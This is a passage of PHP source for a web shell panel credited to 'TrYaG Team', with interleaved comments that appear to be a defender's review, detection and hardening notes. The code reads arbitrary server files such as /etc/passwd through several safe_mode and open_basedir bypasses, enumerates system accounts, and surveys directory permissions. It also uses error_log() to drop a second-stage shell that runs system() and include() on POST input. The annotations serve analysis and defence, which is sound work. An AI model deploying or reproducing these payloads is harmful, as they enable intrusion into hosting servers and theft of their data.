  573. $dtime = dechex($this->unix2DosTime($time));
  574. $hexdtime = '\x' . $dtime[6] . $dtime[7]
  575. . '\x' . $dtime[4] . $dtime[5]
  576. . '\x' . $dtime[2] . $dtime[3]
  577. . '\x' . $dtime[0] . $dtime[1];
  578. eval('$hexdtime = "' . $hexdtime . '";');
  579. $fr = "\x50\x4b\x03\x04";
  580. $fr .= "\x14\x00";
  581. $fr .= "\x00\x00";
  582. $fr .= "\x08\x00";
  583. $fr .= $hexdtime;
  584.  
  585. $unc_len = strlen($data);
  586. $crc = crc32($data);
  587. $zdata = gzcompress($data);
  588. $c_len = strlen($zdata);
  589. $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
  590. $fr .= pack('V', $crc);
  591. $fr .= pack('V', $c_len);
  592. $fr .= pack('V', $unc_len);
  593. $fr .= pack('v', strlen($name));
  594. $fr .= pack('v', 0);
  595. $fr .= $name;
  596.  
  597. $fr .= $zdata;
  598.  
  599. $fr .= pack('V', $crc);
  600. $fr .= pack('V', $c_len);
  601. $fr .= pack('V', $unc_len);
  602.  
  603. $this -> datasec[] = $fr;
  604. $new_offset = strlen(implode('', $this->datasec));
  605.  
  606. $cdrec = "\x50\x4b\x01\x02";
  607. $cdrec .= "\x00\x00";
  608. $cdrec .= "\x14\x00";
  609. $cdrec .= "\x00\x00";
  610. $cdrec .= "\x08\x00";
  611. $cdrec .= $hexdtime;
  612. $cdrec .= pack('V', $crc);
  613. $cdrec .= pack('V', $c_len);
  614. $cdrec .= pack('V', $unc_len);
  615. $cdrec .= pack('v', strlen($name) );
  616. $cdrec .= pack('v', 0 );
  617. $cdrec .= pack('v', 0 );
  618. $cdrec .= pack('v', 0 );
  619. $cdrec .= pack('v', 0 );
  620. $cdrec .= pack('V', 32 );
  621. $cdrec .= pack('V', $this -> old_offset );
  622. $this -> old_offset = $new_offset;
  623. $cdrec .= $name;
  624.  
  625. $this -> ctrl_dir[] = $cdrec;
  626. }
  627.  
  628. function file() {
  629. $data = implode('', $this -> datasec);
  630. $ctrldir = implode('', $this -> ctrl_dir);
  631. return
  632. $data .
  633. $ctrldir .
  634. $this -> eof_ctrl_dir .
  635. pack('v', sizeof($this -> ctrl_dir)) .
  636. pack('v', sizeof($this -> ctrl_dir)) .
  637. pack('V', strlen($ctrldir)) .
  638. pack('V', strlen($data)) .
  639. "\x00\x00";
  640. }
  641. }
  642.  
  // Dump one MySQL table as SQL text: a DROP/CREATE statement rebuilt from SHOW FIELDS and SHOW KEYS,
  // followed by one INSERT per row. Each piece is written to $fp when $fp is truthy, otherwise echoed.
  // No connection argument is passed to the mysql_* calls, so the most recently opened link is used.
  // Nothing in the visible part of the file calls this function.
  // Defender view: $table is interpolated into every statement without quoting, and the whole table
  // is read with SELECT *. A database account limited to what the application needs bounds what
  // such a dump can reach.
  // NOTE(review): the mysql_* extension was removed in PHP 7.0; each() and implode() with the
  // separator as second argument were removed in PHP 8.0.
  643. function sqldumptable($table, $fp=0) {
  644. $tabledump = "DROP TABLE IF EXISTS $table;\n";
  645. $tabledump .= "CREATE TABLE $table (\n";
  646.  
  647. $firstfield=1;
  648.  
  // Column definitions: name and type, then DEFAULT / NOT NULL / extra attributes when present.
  649. $fields = mysql_query("SHOW FIELDS FROM $table");
  650. while ($field = mysql_fetch_array($fields)) {
  651. if (!$firstfield) {
  652. $tabledump .= ",\n";
  653. } else {
  654. $firstfield=0;
  655. }
  656. $tabledump .= " $field[Field] $field[Type]";
  657. if (!empty($field["Default"])) {
  658. $tabledump .= " DEFAULT '$field[Default]'";
  659. }
  660. if ($field['Null'] != "YES") {
  661. $tabledump .= " NOT NULL";
  662. }
  663. if ($field['Extra'] != "") {
  664. $tabledump .= " $field[Extra]";
  665. }
  666. }
  667. mysql_free_result($fields);
  668.  
  // Group key columns by key name in $index (not initialised beforehand); unique non-primary keys
  // are tagged with a "UNIQUE|" prefix.
  669. $keys = mysql_query("SHOW KEYS FROM $table");
  670. while ($key = mysql_fetch_array($keys)) {
  671. $kname=$key['Key_name'];
  672. if ($kname != "PRIMARY" and $key['Non_unique'] == 0) {
  673. $kname="UNIQUE|$kname";
  674. }
  675. if(!is_array($index[$kname])) {
  676. $index[$kname] = array();
  677. }
  678. $index[$kname][] = $key['Column_name'];
  679. }
  680. mysql_free_result($keys);
  681.  
  // Emit the key clauses. The "UNIQUE|" prefix is stripped again and the key is written as a plain
  // KEY, so uniqueness is not reproduced in the dump.
  682. while(list($kname, $columns) = @each($index)) {
  683. $tabledump .= ",\n";
  684. $colnames=implode($columns,",");
  685.  
  686. if ($kname == "PRIMARY") {
  687. $tabledump .= " PRIMARY KEY ($colnames)";
  688. } else {
  689. if (substr($kname,0,6) == "UNIQUE") {
  690. $kname=substr($kname,7);
  691. }
  692. $tabledump .= " KEY $kname ($colnames)";
  693. }
  694. }
  695.  
  696. $tabledump .= "\n);\n\n";
  697. if ($fp) {
  698. fwrite($fp,$tabledump);
  699. } else {
  700. echo $tabledump;
  701. }
  702.  
  // Row data: one INSERT per row; unset columns become NULL, everything else is quoted after
  // mysql_escape_string().
  703. $rows = mysql_query("SELECT * FROM $table");
  704. $numfields = mysql_num_fields($rows);
  705. while ($row = mysql_fetch_array($rows)) {
  706. $tabledump = "INSERT INTO $table VALUES(";
  707.  
  708. $fieldcounter=-1;
  709. $firstfield=1;
  710. while (++$fieldcounter<$numfields) {
  711. if (!$firstfield) {
  712. $tabledump.=", ";
  713. } else {
  714. $firstfield=0;
  715. }
  716.  
  717. if (!isset($row[$fieldcounter])) {
  718. $tabledump .= "NULL";
  719. } else {
  720. $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
  721. }
  722. }
  723.  
  724. $tabledump .= ");\n";
  725.  
  726. if ($fp) {
  727. fwrite($fp,$tabledump);
  728. } else {
  729. echo $tabledump;
  730. }
  731. }
  732. mysql_free_result($rows);
  733. }
  734.  
  735. class FORMS {
  736. function tableheader() {
  737. echo "<table width=\"775\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\">\n";
  738. }
  739.  
  740. function headerform($arg=array()) {
  741. global $dir;
  742. if ($arg[enctype]){
  743. $enctype="enctype=\"$arg[enctype]\"";
  744. } else {
  745. $enctype="";
  746. }
  747. if (!isset($arg[method])) {
  748. $arg[method] = "POST";
  749. }
  750. if (!isset($arg[action])) {
  751. $arg[action] = '';
  752. }
  753. echo " <form action=\"".$arg[action]."\" method=\"".$arg[method]."\" $enctype>\n";
  754. echo " <tr>\n";
  755. echo " <td>".$arg[content]."</td>\n";
  756. echo " </tr>\n";
  757. echo " </form>\n";
  758. }
  759.  
  760. function tdheader($title) {
  761. global $dir;
  762. echo " <tr class=\"firstalt\">\n";
  763. echo " <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">·mohajer</a>]</b></td>\n";
  764. echo " </tr>\n";
  765. }
  766.  
  767. function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') {
  768. if ($bgcolor=='2') {
  769. $css="secondalt";
  770. } elseif ($bgcolor=='1') {
  771. $css="firstalt";
  772. } else {
  773. $css=$bgcolor;
  774. }
  775. $height = empty($height) ? "" : " height=".$height;
  776. $colspan = empty($colspan) ? "" : " colspan=".$colspan;
  777. echo " <tr class=\"".$css."\">\n";
  778. echo " <td align=\"".$align."\"".$height." ".$colspan." ".$extra.">".$content."</td>\n";
  779. echo " </tr>\n";
  780. }
  781.  
  782. function tablefooter() {
  783. echo "</table>\n";
  784. }
  785.  
  786. function formheader($action='',$title,$target='') {
  787. global $dir;
  788. $target = empty($target) ? "" : " target=\"".$target."\"";
  789. echo " <form action=\"$action\" method=\"POST\"".$target.">\n";
  790. echo " <tr class=\"firstalt\">\n";
  791. echo " <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">·µ»?</a>]</b></td>\n";
  792. echo " </tr>\n";
  793. }
  794.  
  795. function makehidden($name,$value=''){
  796. echo "<input type=\"hidden\" name=\"$name\" value=\"$value\">\n";
  797. }
  798.  
  799. function makeinput($name,$value='',$extra='',$type='text',$size='30',$css='input'){
  800. $css = ($css == 'input') ? " class=\"input\"" : "";
  801. $input = "<input name=\"$name\" value=\"$value\" type=\"$type\" ".$css." size=\"$size\" $extra>\n";
  802. return $input;
  803. }
  804. function makeid($name,$value='',$extra='',$type='select',$size='30',$css='input'){
  805. $css = ($css == 'input') ? " class=\"input\"" : "";
  806. $input = "<select name=plugin><option>cat /etc/passwd</option></select>";
  807. return $input;
  808. }
  809. function makeimp($name,$value='',$extra='',$type='select',$size='30',$css='input'){
  810. $css = ($css == 'input') ? " class=\"input\"" : "";
  811. $input = "<select name=switch><option value=file>View file</option><option value=dir>View dir</option></select>";
  812. return $input;
  813. }
  814. function maketextarea($name,$content='',$cols='100',$rows='20',$extra=''){
  815. $textarea = "<textarea name=\"".$name."\" cols=\"".$cols."\" rows=\"".$rows."\" ".$extra.">".$content."</textarea>\n";
  816. return $textarea;
  817. }
  818.  
  819. function formfooter($over='',$height=''){
  820. $height = empty($height) ? "" : " height=\"".$height."\"";
  821. echo " <tr class=\"secondalt\">\n";
  822. echo " <td align=\"center\"".$height."><input class=\"input\" type=\"submit\" value='mohajer'></td>\n";
  823. echo " </tr>\n";
  824. echo " </form>\n";
  825. echo $end = empty($over) ? "" : "</table>\n";
  826. }
  827.  
  828. function makeselect($arg = array()){
  829. if ($arg[multiple]==1) {
  830. $multiple = " multiple";
  831. if ($arg[size]>0) {
  832. $size = "size=$arg[size]";
  833. }
  834. }
  835. if ($arg[css]==0) {
  836. $css = "class=\"input\"";
  837. }
  838. $select = "<select $css name=\"$arg[name]\"$multiple $size>\n";
  839. if (is_array($arg[option])) {
  840. foreach ($arg[option] AS $key=>$value) {
  841. if (!is_array($arg[selected])) {
  842. if ($arg[selected]==$key) {
  843. $select .= "<option value=\"$key\" selected>$value</option>\n";
  844. } else {
  845. $select .= "<option value=\"$key\">$value</option>\n";
  846. }
  847.  
  848. } elseif (is_array($arg[selected])) {
  849. if ($arg[selected][$key]==1) {
  850. $select .= "<option value=\"$key\" selected>$value</option>\n";
  851. } else {
  852. $select .= "<option value=\"$key\">$value</option>\n";
  853. }
  854. }
  855. }
  856. }
  857. $select .= "</select>\n";
  858. return $select;
  859. }
  860. }
  861.  
  862.  
  863.  
  // Renders the operator panel for the "read file" group: one form per handler that follows
  // in the listing. The POST field names used here (Mohajer22, plugin, curl, copy, M2,
  // switch/string, ER) are the ones those handlers test.
  // Triage note: these field names, the pre-filled "/etc/passwd" values and the default drop
  // name "Mohajer22.php" are fixed strings in this sample, so they work as content signatures
  // for docroot scans and for matching logged POST bodies.
  // `Show` is written as a bare word (undefined constant), not a quoted string; PHP 8 raises
  // an Error for that, older versions fall back to the string with a notice/warning.
  864. $tb->tableheader();
  865. $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Exploit: read file [SQL , id , CURL , copy , ini_restore , imap] & Make file ERORR</b></td></tr></table>','center','top');
  866. $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
  867.  
  868.  
  869. $tb->headerform(array('content'=>'<FONT COLOR=RED>read file SQL:</FONT><br>' .$tb->makeinput('Mohajer22','/etc/passwd' ).$tb->makeinput('',Show,'Mohajer22','submit')));
  870. $tb->headerform(array('content'=>'<FONT COLOR=RED>read file id:</FONT><br>' .$tb->makeid('plugin','cat /etc/passwd' ).$tb->makeinput('',Show,'plugin','submit')));
  871. $tb->headerform(array('content'=>'<FONT COLOR=RED>read file CURL:</FONT><br>' .$tb->makeinput('curl','/etc/passwd' ).$tb->makeinput('',Show,'curl','submit')));
  872. $tb->headerform(array('content'=>'<FONT COLOR=RED>read file copy:</FONT><br>' .$tb->makeinput('copy','/etc/passwd' ).$tb->makeinput('',Show,'copy','submit')));
  873. $tb->headerform(array('content'=>'<FONT COLOR=RED>read file ini_restore:</FONT><br>' .$tb->makeinput('M2','/etc/passwd' ).$tb->makeinput('',Show,'M2','submit')));
  874. $tb->headerform(array('content'=>'<FONT COLOR=RED>read file or dir with imap:</FONT><br>' .$tb->makeimp('switch','/etc/passwd' ).$tb->makeinput('string','/etc/passwd' ).$tb->makeinput('string','Show','','submit')));
  875. $tb->headerform(array('content'=>'<FONT COLOR=RED>Make file ERORR:</FONT><br>' .$tb->makeinput('ER','Mohajer22.php' ).$tb->makeinput('ER','Write','ER','submit')));
  876.  
  877.  
  878. // read file SQL ( ) //
  // Handler for POST field "Mohajer22". It has the MySQL client load a local file into a
  // temporary one-column LONGBLOB table (LOAD DATA LOCAL INFILE) and prints the first row,
  // HTML-escaped, inside a <textarea>.
  // Review notes (defender view):
  //  - With LOCAL the file is opened on the client side of the connection, i.e. by the PHP
  //    process, which is presumably why it appears in a panel aimed at PHP-level path limits.
  //    Hardening: local_infile=0 on the MySQL server and mysqli.allow_local_infile=Off
  //    (mysql.allow_local_infile for the legacy extension) in php.ini.
  //  - $file goes into the statement unescaped.
  //  - $mdb, $mhost, $muser and $mpass are not assigned anywhere in this part of the listing;
  //    presumably they are set earlier in the file.
  //  - $mysql_files is built but never read by the code shown here.
  //  - mysql_* is the legacy extension removed in PHP 7.0.
  879. if(empty($_POST['Mohajer22'])){
  880. } else {
  881. echo "read file SQL","<br>" ;
  882. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  883. $file=$_POST['Mohajer22'];
  884.  
  885.  
  886. $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
  887. $mysql_files = explode(':', $mysql_files_str);
  888.  
  // Table name is 'A' + current Unix time; the two "never happens" terminators make the
  // whole file arrive as a single field of a single row.
  889. $sql = array (
  890. "USE $mdb",
  891. 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
  892. "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
  893. . "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
  894. . "ESCAPED BY '' "
  895. . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
  896.  
  897. "SELECT a FROM $tbl LIMIT 1"
  898. );
  899. mysql_connect ($mhost, $muser, $mpass);
  900.  
  901. foreach ($sql as $statement) {
  902. $q = mysql_query ($statement);
  903.  
  // A failing statement ends the request with the statement text and the MySQL error in the
  // response body.
  904. if ($q == false) die (
  905. "FAILED: " . $statement . "\n" .
  906. "REASON: " . mysql_error () . "\n"
  907. );
  908.  
  // Statements without a result set are skipped here; @ hides the warning they would raise.
  909. if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
  910.  
  911. echo htmlspecialchars($r[0]);
  912. mysql_free_result ($q);
  913. }
  914. echo "</textarea>";
  915. }
  916. // ERORR //
  // Handler for POST field "ER". error_log() with message type 3 appends its first argument to
  // the file named by the third argument, here the request-supplied $ERORR. The "message" is
  // a complete HTML/PHP page, so the call is used as a file-write primitive that drops a
  // second-stage script; `echo` prints error_log()'s boolean result.
  // What the dropped page does (all visible in the string below): copies an uploaded file
  // into the working directory, passes POST "m" to system(), and passes POST "cmd" to
  // include(). It uses the short open tag "<?" and reads $fileup / $fileup_name directly,
  // which presumably relies on register_globals-era behaviour. TODO confirm.
  // Detection: file-integrity monitoring for new *.php files under the docroot; content
  // match on the title string "Exploit: error_log() By * TrYaG Team *"; the form's default
  // drop name is Mohajer22.php.
  // Mitigation: docroot and include paths not writable by the web-server account; list
  // error_log, system and exec in disable_functions where the application allows it.
  917. if(empty($_POST['ER'])){
  918. } else {
  919. $ERORR=$_POST['ER'];
  920. echo error_log("
  921. <html>
  922. <head>
  923. <title> Exploit: error_log() By * TrYaG Team * </title>
  924. <body bgcolor=\"#000000\">
  925. <table Width='100%' height='10%' bgcolor='#8C0404' border='1'>
  926. <tr>
  927. <td><center><font size='6' color='#BBB516'> By TrYaG Team</font></center></td>
  928. </tr>
  929. </table>
  930. <font color='#FF0000'>
  931. </head>
  932. <?
  933. if(\$fileup == \"\"){
  934. ECHO \" reade for up \";
  935. }else{
  936. \$path= exec(\"pwd\");
  937. \$path .= \"/\$fileup_name\";
  938. \$CopyFile = copy(\$fileup,\"\$path\");
  939. if(\$CopyFile){
  940. echo \" up ok \";
  941. }else{
  942. echo \" no up \";
  943. }
  944. }
  945. if(empty(\$_POST['m'])){
  946. } else {
  947. \$m=\$_POST['m'];
  948. echo system(\$m);
  949. }
  950. if(empty(\$_POST['cmd'])){
  951. } else {
  952. \$h= \$_POST['cmd'];
  953. print include(\$h) ;
  954. }
  955. ?>
  956. <form method='POST' enctype='multipart/form-data' >
  957. <input type='file' name='fileup' size='20'>
  958. <input type='submit' value=' up '>
  959. </form>
  960. <form method='POST' >
  961. <input type='cmd' name='cmd' size='20'>
  962. <input type='submit' value=' open (shill.txt) '>
  963. </form>
  964. <form method='POST' enctype='multipart/form-data' >
  965. <input type='text' name='m' size='20'>
  966. <input type='submit' value=' run '>
  967. <input type='reset' value=' reset '>
  968. </form>
  969. ", 3,$ERORR);
  970. }
  971.  
  972. // id //
  // Handler for POST field "plugin". It produces a passwd-style account listing without
  // opening any file: posix_getpwuid() is called for every uid from 0 to 59999 and each field
  // of every hit is printed, colon-separated, one account per line.
  // Review notes (defender view):
  //  - Values are printed without HTML escaping.
  //  - each() was removed in PHP 8.0.
  //  - The `break;` below is not inside a loop or switch. PHP 7 and later reject that at
  //    compile time, so the file as pasted only parses on PHP 5.x. That helps when judging
  //    whether a copy found on a host could have executed there.
  //  - Mitigation: add posix_getpwuid to disable_functions if the application does not use it.
  973. if ($_POST['plugin'] ){
  974. echo "read file id" ,"<br>";
  975. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  976.  
  977.  
  978.  
  979. for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd
  980. $ara = posix_getpwuid($uid);
  981. if (!empty($ara)) {
  982. while (list ($key, $val) = each($ara)){
  983. print "$val:";
  984. }
  985. print "\n";
  986. }
  987. }
  988. echo "</textarea>";
  989. break;
  990.  
  991.  
  992. }
  993.  
  994.  
  995. // CURL //
  // Handler for POST field "curl". It builds a file:// URL from the request value, followed
  // by an embedded NUL byte and a "../" run that ends in this script's own path (__FILE__).
  // Presumably the intent is that a path check sees the trailing, permitted path while the
  // file open stops at the NUL; whether that works depends on the PHP and libcurl versions.
  // Review notes (defender view):
  //  - CURLOPT_RETURNTRANSFER is not set, so curl_exec() writes the body straight to the
  //    response and returns a bool; the transfer runs twice and var_dump() shows only the bool.
  //  - The body is emitted without HTML escaping.
  //  - Mitigation: current PHP and libcurl builds; in application code that takes URLs,
  //    restrict schemes with CURLOPT_PROTOCOLS so file:// is never accepted.
  996. if(empty($_POST['curl'])){
  997.  
  998. } else {
  999. echo "read file CURL","<br>" ;
  1000. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  1001. $m=$_POST['curl'];
  1002. $ch =
  1003. curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
  1004. curl_exec($ch);
  1005. var_dump(curl_exec($ch));
  1006. echo "</textarea>";
  1007. }
  1008.  
  1009. // copy//
  // Handler for POST field "copy". It copies "compress.zlib://<request value>" into a
  // tempnam() file, reads that file back and prints it HTML-escaped. Going through the stream
  // wrapper is presumably what the author relied on to get past path restrictions in the PHP
  // builds this was written for. Confirm against the target version.
  // Review notes (defender view):
  //  - tempnam() is given an empty directory ($tymczas), so the temp file is expected to land
  //    in the system temp directory with a name starting "cx".
  //  - On the failure branch die() runs before unlink(), so the temp file stays behind;
  //    stray "cx*" temp files owned by the web-server account are a host artefact.
  //  - fopen() is not checked, and an empty source makes fread() run with length 0.
  //  - The closing </textarea> is only written on the success branch.
  1010. $u1p="";
  1011. $tymczas="";
  1012. if(empty($_POST['copy'])){
  1013. } else {
  1014. echo "read file copy" ,"<br>";
  1015. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  1016. $u1p=$_POST['copy'];
  1017. $temp=tempnam($tymczas, "cx");
  1018. if(copy("compress.zlib://".$u1p, $temp)){
  1019. $zrodlo = fopen($temp, "r");
  1020. $tekst = fread($zrodlo, filesize($temp));
  1021. fclose($zrodlo);
  1022. echo "".htmlspecialchars($tekst)."";
  1023. unlink($temp);
  1024. echo "</textarea>";
  1025. } else {
  1026. die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
  1027. <B>".htmlspecialchars($u1p)."</B> dosen't exists or you don't have
  1028. access.</CENTER></FONT>");
  1029. }
  1030. }
  1031.  
  1032. /// ini_restore //
  // Handler for POST field "M2". It prints the current safe_mode and open_basedir values and
  // readfile()s the requested path, then calls ini_restore() on both directives, prints them
  // again and readfile()s the same path a second time.
  // ini_restore() puts a directive back to its original value. Presumably the target is a
  // setup where the restriction was applied per virtual host or directory and the restore
  // drops it; this is version-specific, confirm before relying on it in an assessment.
  // Review notes (defender view):
  //  - readfile() streams the raw bytes into the <textarea> with no escaping; $s only receives
  //    the byte count and is not used.
  //  - safe_mode was removed in PHP 5.4.
  //  - Mitigation: add ini_restore to disable_functions, and enforce tenant separation at
  //    the OS level (separate accounts, chroot or containers) rather than through ini
  //    directives alone.
  1033. if(empty($_POST['M2'])){
  1034. } else {
  1035. echo "read file ini_restore","<br> ";
  1036. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  1037. $m=$_POST['M2'];
  1038. echo ini_get("safe_mode");
  1039. echo ini_get("open_basedir");
  1040. $s=readfile("$m");
  1041. ini_restore("safe_mode");
  1042. ini_restore("open_basedir");
  1043. echo ini_get("safe_mode");
  1044. echo ini_get("open_basedir");
  1045. $s=readfile("$m");
  1046. echo "</textarea>";
  1047. }
  1048.  
  1049. // imap //
  // Handlers for POST fields "string" and "switch". The request value is handed to the IMAP
  // extension as a mailbox name: with switch=file the body of message 1 of that "mailbox" is
  // printed; with switch=dir imap_list() is called with a reference and pattern taken from
  // the value (split on "|", pattern defaults to "*").
  // Review notes (defender view):
  //  - The file branch does not check imap_open()'s result before imap_body()/imap_close().
  //  - The dir branch always opens the fixed path "/etc/passwd" as its stream.
  //  - Output is not HTML-escaped, and <pre> is emitted inside a <textarea>.
  //  - Mitigation: do not load the imap extension on hosts that do not need it, or list
  //    imap_open in disable_functions.
  1050.  
  1051. $string = !empty($_POST['string']) ? $_POST['string'] : 0;
  1052. $switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
  1053.  
  1054. if ($string && $switch == "file") {
  1055. echo "read file imap" ,"<br>";
  1056. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  1057.  
  1058. $stream = imap_open($string, "", "");
  1059.  
  1060. $str = imap_body($stream, 1);
  1061. if (!empty($str))
  1062. echo "<pre>".$str."</pre>";
  1063. imap_close($stream);
  1064. echo "</textarea>";
  1065. } elseif ($string && $switch == "dir") {
  1066. echo "read dir imap","<br>" ;
  1067. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  1068.  
  1069. $stream = imap_open("/etc/passwd", "", "");
  1070. if ($stream == FALSE)
  1071. die("Can't open imap stream");
  1072. $string = explode("|",$string);
  1073. if (count($string) > 1)
  1074. $dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
  1075. else
  1076. $dir_list = imap_list($stream, trim($string[0]), "*");
  1077. echo "<pre>";
  1078. for ($i = 0; $i < count($dir_list); $i++)
  1079. echo "$dir_list[$i]"."<p>&nbsp;</p>" ;
  1080. echo "</pre>";
  1081. imap_close($stream);
  1082. echo "</textarea>";
  1083. }
  // Closes the table cell opened for the "read file" panel.
  1084. $tb->tdbody ("</td></tr></table>");
  1085. // open dir //
  // "Open dir" panel. Without POST "m" it prints the path form. With it, the request-supplied
  // directory is scanned once per permission value (0777, 0755, 0644, 0750, 0604, 0705, 0606,
  // 0703) and the sub-directories whose mode matches are listed under a coloured heading.
  // Review notes (defender view):
  //  - This is a permission survey of the host: the first pass looks for world-writable
  //    (0777) directories. Run the same survey yourself and remove world-write from anything
  //    under the docroot or upload paths.
  //  - $REQUEST_URI is interpolated into the form action unescaped; it is not assigned in the
  //    visible code (presumably a register_globals-era variable).
  //  - opendir() results are never checked, and only the first handle is closed with
  //    closedir(); the seven later passes leave their handles open.
  //  - file_exists('.*') tests for a file literally named ".*" in the working directory; it
  //    does not filter dot entries, so "." and ".." are listed when their mode matches.
  //  - $method is read from POST but not used in the visible code.
  //  - Entry names are printed without HTML escaping.
  1086. $tb->tableheader();
  1087. $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Exploit: Open dir </b></td></tr></table>','center','top');
  1088. $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
  1089.  
  1090. if(empty($_POST['m'])){
  1091. echo "<div><FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'>
  1092. <table id=tb><tr><td><FONT COLOR=\"RED\">path dir</FONT>
  1093. <INPUT type='text' name='m' size=70 value='./'>
  1094. <INPUT type='submit' value='show' id=input></td></tr></table></form></div>";
  1095.  
  1096. } else {
  1097. $m=$_POST['m'];
  1098. $spath = $m ;
  1099. $path = $m ;
  1100.  
  1101.  
  1102.  
  1103.  
  1104. $method = intval(trim($_POST['method']));
  1105.  
  // Pass 1: mode 0777.
  1106. $handle = opendir($path);
  1107.  
  1108. $_folders = array();
  1109.  
  1110. $i = 0;
  1111.  
  1112. while (false !== ($file = readdir($handle)))
  1113. {
  1114. $full_path = "$path/$file";
  // Last four octal digits of the mode, compared as a string below.
  1115. $perms = substr(sprintf('%o', fileperms($full_path)), -4);
  1116.  
  1117. if ((is_dir($full_path)) && ($perms == '0777'))
  1118. {
  1119. if (!file_exists('.*')) {
  1120.  
  1121. $_folders[$i] = $file;
  1122.  
  1123. $i++;
  1124. }
  1125. }
  1126. }
  1127.  
  1128.  
  1129. closedir($handle);
  1130. clearstatcache();
  1131.  
  1132.  
  1133.  
  1134. echo '<strong><FONT COLOR=#00FF00>The folders is 777 :</strong><br />';
  1135.  
  1136. foreach ($_folders as $folder)
  1137. {
  1138. echo $folder.'<br />';
  1139. }
  1140. //////////
  // Pass 2: mode 0755. From here on the handle is not closed after the loop.
  1141. $handle = opendir($path);
  1142.  
  1143. $_folders = array();
  1144.  
  1145. $i = 0;
  1146.  
  1147. while (false !== ($file1 = readdir($handle)))
  1148. {
  1149. $full_path = "$path/$file1";
  1150. $perms = substr(sprintf('%o', fileperms($full_path)), -4);
  1151.  
  1152. if ((is_dir($full_path)) && ($perms == '0755'))
  1153. {
  1154. if (!file_exists('.*')) {
  1155.  
  1156. $_folders[$i] = $file1;
  1157.  
  1158. $i++;
  1159. }
  1160. }
  1161. }
  1162.  
  1163.  
  1164.  
  1165. clearstatcache();
  1166.  
  1167.  
  1168.  
  1169. echo '</FONT><strong><FONT COLOR=#FF9900>The folders is 755 :</strong><br />';
  1170.  
  1171. foreach ($_folders as $folder)
  1172. {
  1173. echo $folder.'<br />';
  1174. }
  1175. //////////
  // Pass 3: mode 0644.
  1176. $handle = opendir($path);
  1177.  
  1178. $_folders = array();
  1179.  
  1180. $i = 0;
  1181.  
  1182. while (false !== ($file1 = readdir($handle)))
  1183. {
  1184. $full_path = "$path/$file1";
  1185. $perms = substr(sprintf('%o', fileperms($full_path)), -4);
  1186.  
  1187. if ((is_dir($full_path)) && ($perms == '0644'))
  1188. {
  1189. if (!file_exists('.*')) {
  1190.  
  1191. $_folders[$i] = $file1;
  1192.  
  1193. $i++;
  1194. }
  1195. }
  1196. }
  1197.  
  1198.  
  1199.  
  1200. clearstatcache();
  1201.  
  1202.  
  1203.  
  1204. echo '</FONT><strong><FONT COLOR=#CC9999>The folders is 644 :</strong><br />';
  1205.  
  1206. foreach ($_folders as $folder)
  1207. {
  1208. echo $folder.'<br />';
  1209. }
  1210. //////////
  // Pass 4: mode 0750.
  1211. $handle = opendir($path);
  1212.  
  1213. $_folders = array();
  1214.  
  1215. $i = 0;
  1216.  
  1217. while (false !== ($file1 = readdir($handle)))
  1218. {
  1219. $full_path = "$path/$file1";
  1220. $perms = substr(sprintf('%o', fileperms($full_path)), -4);
  1221.  
  1222. if ((is_dir($full_path)) && ($perms == '0750'))
  1223. {
  1224. if (!file_exists('.*')) {
  1225.  
  1226. $_folders[$i] = $file1;
  1227.  
  1228. $i++;
  1229. }
  1230. }
  1231. }
  1232.  
  1233.  
  1234.  
  1235. clearstatcache();
  1236.  
  1237.  
  1238.  
  1239. echo '</FONT><strong><FONT COLOR=#9999CC>The folders is 750 :</strong><br />';
  1240.  
  1241. foreach ($_folders as $folder)
  1242. {
  1243. echo $folder.'<br />';
  1244. }
  1245. //////////
  // Pass 5: mode 0604.
  1246. $handle = opendir($path);
  1247.  
  1248. $_folders = array();
  1249.  
  1250. $i = 0;
  1251.  
  1252. while (false !== ($file1 = readdir($handle)))
  1253. {
  1254. $full_path = "$path/$file1";
  1255. $perms = substr(sprintf('%o', fileperms($full_path)), -4);
  1256.  
  1257. if ((is_dir($full_path)) && ($perms == '0604'))
  1258. {
  1259. if (!file_exists('.*')) {
  1260.  
  1261. $_folders[$i] = $file1;
  1262.  
  1263. $i++;
  1264. }
  1265. }
  1266. }
  1267.  
  1268.  
  1269.  
  1270. clearstatcache();
  1271.  
  1272.  
  1273.  
  1274. echo '</FONT><strong><FONT COLOR=#669999>The folders is 604 :</strong><br />';
  1275.  
  1276. foreach ($_folders as $folder)
  1277. {
  1278. echo $folder.'<br />';
  1279. }
  1280. //////////
  // Pass 6: mode 0705.
  1281. $handle = opendir($path);
  1282.  
  1283. $_folders = array();
  1284.  
  1285. $i = 0;
  1286.  
  1287. while (false !== ($file1 = readdir($handle)))
  1288. {
  1289. $full_path = "$path/$file1";
  1290. $perms = substr(sprintf('%o', fileperms($full_path)), -4);
